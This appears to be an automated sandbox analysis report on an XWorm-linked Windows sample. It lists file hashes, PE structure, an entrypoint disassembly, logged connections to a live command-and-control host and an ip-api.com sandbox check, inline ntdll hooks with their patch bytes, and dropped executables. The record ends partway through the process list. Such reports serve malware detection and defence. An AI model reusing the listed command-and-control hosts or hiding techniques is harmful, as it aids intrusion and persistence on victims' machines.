                                                                                                                                                                                • VXD Driver (31/22) 0.00%
                                                                                                                                                                                File name:aoKTzGQSRP.exe
                                                                                                                                                                                File size:10'214'400 bytes
                                                                                                                                                                                MD5:86357c1fffbe566da1d9903ab765f921
                                                                                                                                                                                SHA1:1d55db2dd9e556ff066e297273e402130adf515f
                                                                                                                                                                                SHA256:202cb1021a1db9bd59a642ebee781bbafe284faf3fe1ba8e0ed1d89b3878ddbf
                                                                                                                                                                                SHA512:c181397112d6600d161033ee2316478358250a7afe8822999b554af1ea01544612665722800ba4fd8e2e1ad4a68a596c4370d52795428f1b43840d801d107d60
                                                                                                                                                                                SSDEEP:196608:lW4hA5uDoRign+zgad1nu8Qely82mqwmjYBj5jY+MZ+yBSJ84k:lW4hXciVguRrlPqw4iY+q4/k
                                                                                                                                                                                TLSH:46A62361E994EA69C2114D7CE502ECF015206F86D14CACAB2CE6FEFFB0716E547BC1A1
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@..................................=.....................................

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:0f3331332b308228

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x401481
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                DLL Characteristics:
                                                                                                                                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:6f462fcc6b830b77fb3fef2add9dc570

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                push ebp
                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                sub esp, 00000008h
                                                                                                                                                                                nop
                                                                                                                                                                                mov eax, 00000004h
                                                                                                                                                                                push eax
                                                                                                                                                                                mov eax, 00000000h
                                                                                                                                                                                push eax
                                                                                                                                                                                lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                push eax
                                                                                                                                                                                call 00007FA97D2B1AEDh
                                                                                                                                                                                add esp, 0Ch
                                                                                                                                                                                mov eax, 0040145Fh
                                                                                                                                                                                push eax
                                                                                                                                                                                call 00007FA97D2B1B2Fh
                                                                                                                                                                                mov eax, 00000001h
                                                                                                                                                                                push eax
                                                                                                                                                                                call 00007FA97D2B1B2Ch
                                                                                                                                                                                add esp, 04h
                                                                                                                                                                                mov eax, 00030000h
                                                                                                                                                                                push eax
                                                                                                                                                                                mov eax, 00010000h
                                                                                                                                                                                push eax
                                                                                                                                                                                call 00007FA97D2B1B20h
                                                                                                                                                                                add esp, 08h
                                                                                                                                                                                mov eax, dword ptr [00DAE1F8h]
                                                                                                                                                                                mov ecx, dword ptr [00DAE1FCh]
                                                                                                                                                                                mov edx, dword ptr [00DAE200h]
                                                                                                                                                                                mov dword ptr [ebp-08h], eax
                                                                                                                                                                                lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                push eax
                                                                                                                                                                                mov eax, dword ptr [00DAF000h]
                                                                                                                                                                                push eax
                                                                                                                                                                                push edx
                                                                                                                                                                                push ecx
                                                                                                                                                                                mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                push eax
                                                                                                                                                                                call 00007FA97D2B1AFAh
                                                                                                                                                                                add esp, 14h
                                                                                                                                                                                mov eax, dword ptr [00DAE1F8h]
                                                                                                                                                                                mov ecx, dword ptr [00DAE1FCh]
                                                                                                                                                                                mov edx, dword ptr [00DAE200h]
                                                                                                                                                                                mov dword ptr [ebp-08h], eax
                                                                                                                                                                                mov eax, dword ptr [edx]
                                                                                                                                                                                push eax
                                                                                                                                                                                mov eax, dword ptr [ecx]
                                                                                                                                                                                push eax
                                                                                                                                                                                mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                push eax
                                                                                                                                                                                call 00007FA97D2B18CCh
                                                                                                                                                                                add esp, 0Ch
                                                                                                                                                                                push eax
                                                                                                                                                                                call 00007FA97D2B1AD0h
                                                                                                                                                                                add esp, 04h
                                                                                                                                                                                leave
                                                                                                                                                                                ret
                                                                                                                                                                                push ebp
                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                sub esp, 00000004h
                                                                                                                                                                                nop
                                                                                                                                                                                mov eax, dword ptr [00DAE1F8h]
                                                                                                                                                                                mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                mov dword ptr [eax], ecx
                                                                                                                                                                                mov eax, dword ptr [00000000h]

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9ae1800x50.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x9b00000x10bd0.rsrc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x9ae1d00x5c.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                .text0x10000x6200x8009326e31db87e6638966332073294d880False0.38818359375data4.412233120079829IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rdata0x20000x9ac3940x9ac40042bb99dd4aeb56834592a750c0c331c3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .bss0x9af0000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .rsrc0x9b00000x10bd00x10c00ef37ea2f40c12f9c6e7d3ac09371fa4fFalse0.05540170242537314data1.6779452272521669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                Resources

                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                RT_ICON0x9b00e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.04860700343073465
                                                                                                                                                                                RT_GROUP_ICON0x9c09100x14data1.0
                                                                                                                                                                                RT_MANIFEST0x9c09240x2abXML 1.0 document, ASCII textEnglishUnited States0.4743777452415813

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                msvcrt.dllmalloc, _sleep, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                                                                                                                                                shell32.dllShellExecuteA
                                                                                                                                                                                kernel32.dllSetUnhandledExceptionFilter

                                                                                                                                                                                Possible Origin

                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                2024-10-22T19:38:22.499718+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649997147.185.221.2128600TCP

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Oct 22, 2024 19:37:10.486315012 CEST49713443192.168.2.6188.114.97.3
                                                                                                                                                                                Oct 22, 2024 19:37:10.486382961 CEST44349713188.114.97.3192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:10.486473083 CEST49713443192.168.2.6188.114.97.3
                                                                                                                                                                                Oct 22, 2024 19:37:10.487071991 CEST49713443192.168.2.6188.114.97.3
                                                                                                                                                                                Oct 22, 2024 19:37:10.487082005 CEST44349713188.114.97.3192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:11.130951881 CEST44349713188.114.97.3192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:11.131928921 CEST49713443192.168.2.6188.114.97.3
                                                                                                                                                                                Oct 22, 2024 19:37:11.131959915 CEST44349713188.114.97.3192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:11.133985043 CEST44349713188.114.97.3192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:11.134051085 CEST49713443192.168.2.6188.114.97.3
                                                                                                                                                                                Oct 22, 2024 19:37:11.136636019 CEST49713443192.168.2.6188.114.97.3
                                                                                                                                                                                Oct 22, 2024 19:37:11.136833906 CEST49713443192.168.2.6188.114.97.3
                                                                                                                                                                                Oct 22, 2024 19:37:14.069993019 CEST4972980192.168.2.6208.95.112.1
                                                                                                                                                                                Oct 22, 2024 19:37:14.075449944 CEST8049729208.95.112.1192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:14.075664997 CEST4972980192.168.2.6208.95.112.1
                                                                                                                                                                                Oct 22, 2024 19:37:14.081002951 CEST4972980192.168.2.6208.95.112.1
                                                                                                                                                                                Oct 22, 2024 19:37:14.086374998 CEST8049729208.95.112.1192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:14.661644936 CEST8049729208.95.112.1192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:14.715759993 CEST4972980192.168.2.6208.95.112.1
                                                                                                                                                                                Oct 22, 2024 19:37:20.079916954 CEST4976628600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:20.085352898 CEST2860049766147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:20.085413933 CEST4976628600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:20.860460997 CEST4976628600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:20.865911007 CEST2860049766147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:21.459717989 CEST4972980192.168.2.6208.95.112.1
                                                                                                                                                                                Oct 22, 2024 19:37:28.564788103 CEST2860049766147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:28.564979076 CEST4976628600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:30.060374022 CEST4976628600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:30.063235044 CEST4981728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:30.065907955 CEST2860049766147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:30.068849087 CEST2860049817147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:30.068937063 CEST4981728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:30.099910021 CEST4981728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:30.105389118 CEST2860049817147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:38.555043936 CEST2860049817147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:38.555103064 CEST4981728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:43.185686111 CEST4981728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:43.188033104 CEST4988828600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:43.191203117 CEST2860049817147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:43.193818092 CEST2860049888147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:43.194096088 CEST4988828600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:43.607911110 CEST4988828600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:43.613272905 CEST2860049888147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:51.678930998 CEST2860049888147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:51.679088116 CEST4988828600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:52.669182062 CEST4988828600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:52.670326948 CEST4994128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:52.674734116 CEST2860049888147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:52.675862074 CEST2860049941147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:52.675935030 CEST4994128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:52.692404032 CEST4994128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:37:52.697910070 CEST2860049941147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:01.173898935 CEST2860049941147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:01.174036980 CEST4994128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:01.919523001 CEST4994128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:01.921024084 CEST4999128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:01.924921036 CEST2860049941147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:01.926740885 CEST2860049991147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:01.926810980 CEST4999128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:01.948081970 CEST4999128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:01.955125093 CEST2860049991147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:10.419925928 CEST2860049991147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:10.420001030 CEST4999128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:11.329999924 CEST4999128600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:11.332237959 CEST4999528600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:11.335716963 CEST2860049991147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:11.337692022 CEST2860049995147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:11.337778091 CEST4999528600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:11.368426085 CEST4999528600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:11.373965025 CEST2860049995147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:20.161156893 CEST2860049995147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:20.161223888 CEST4999528600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:20.162014008 CEST2860049995147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:20.162051916 CEST4999528600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:20.380188942 CEST4999528600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:20.383938074 CEST4999728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:20.385746956 CEST2860049995147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:20.389633894 CEST2860049997147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:20.389822006 CEST4999728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:20.405924082 CEST4999728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:20.411495924 CEST2860049997147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:22.499717951 CEST4999728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:22.505132914 CEST2860049997147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:24.575978041 CEST4999728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:24.581597090 CEST2860049997147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:24.638108969 CEST4999728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:24.644181013 CEST2860049997147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:28.881233931 CEST2860049997147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:28.881356955 CEST4999728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:29.888276100 CEST4999728600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:29.893762112 CEST2860049997147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:29.903001070 CEST4999828600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:29.908557892 CEST2860049998147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:29.908756971 CEST4999828600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:38:38.400903940 CEST2860049998147.185.221.21192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:38:38.401037931 CEST4999828600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:39:20.635726929 CEST4999828600192.168.2.6147.185.221.21
                                                                                                                                                                                Oct 22, 2024 19:39:20.641315937 CEST2860049998147.185.221.21192.168.2.6

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Oct 22, 2024 19:37:10.435028076 CEST6015853192.168.2.61.1.1.1
                                                                                                                                                                                Oct 22, 2024 19:37:10.446355104 CEST53601581.1.1.1192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:14.045494080 CEST5619253192.168.2.61.1.1.1
                                                                                                                                                                                Oct 22, 2024 19:37:14.053606033 CEST53561921.1.1.1192.168.2.6
                                                                                                                                                                                Oct 22, 2024 19:37:20.057557106 CEST5551053192.168.2.61.1.1.1
                                                                                                                                                                                Oct 22, 2024 19:37:20.075754881 CEST53555101.1.1.1192.168.2.6

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                Oct 22, 2024 19:37:10.435028076 CEST192.168.2.61.1.1.10x82f8Standard query (0)dashboard.botghost.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 22, 2024 19:37:14.045494080 CEST192.168.2.61.1.1.10x154aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 22, 2024 19:37:20.057557106 CEST192.168.2.61.1.1.10xaa79Standard query (0)subscribe-bond.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                Oct 22, 2024 19:37:10.446355104 CEST1.1.1.1192.168.2.60x82f8No error (0)dashboard.botghost.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 22, 2024 19:37:10.446355104 CEST1.1.1.1192.168.2.60x82f8No error (0)dashboard.botghost.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 22, 2024 19:37:14.053606033 CEST1.1.1.1192.168.2.60x154aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 22, 2024 19:37:20.075754881 CEST1.1.1.1192.168.2.60xaa79No error (0)subscribe-bond.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • ip-api.com

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                0192.168.2.649729208.95.112.1804188C:\Users\Public\DeadROOTkit.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Oct 22, 2024 19:37:14.081002951 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Oct 22, 2024 19:37:14.661644936 CEST174INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Tue, 22 Oct 2024 17:37:13 GMT
                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                Content-Length: 5
                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                X-Ttl: 60
                                                                                                                                                                                X-Rl: 44
                                                                                                                                                                                Data Raw: 74 72 75 65 0a
                                                                                                                                                                                Data Ascii: true


                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                User Modules

                                                                                                                                                                                Hook Summary

                                                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                                                ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                                                                                                                                                                                Processes

                                                                                                                                                                                Process: winlogon.exe, Module: ntdll.dll
                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                Process: explorer.exe, Module: ntdll.dll
                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:13:37:00
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\aoKTzGQSRP.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\aoKTzGQSRP.exe"
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:10'214'400 bytes
                                                                                                                                                                                MD5 hash:86357C1FFFBE566DA1D9903AB765F921
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:2
                                                                                                                                                                                Start time:13:37:04
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                                                                                                                                                                                Imagebase:0x7ff6fabe0000
                                                                                                                                                                                File size:9'629'457 bytes
                                                                                                                                                                                MD5 hash:CC32561980C2400C490A4849C78E38ED
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 34%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:3
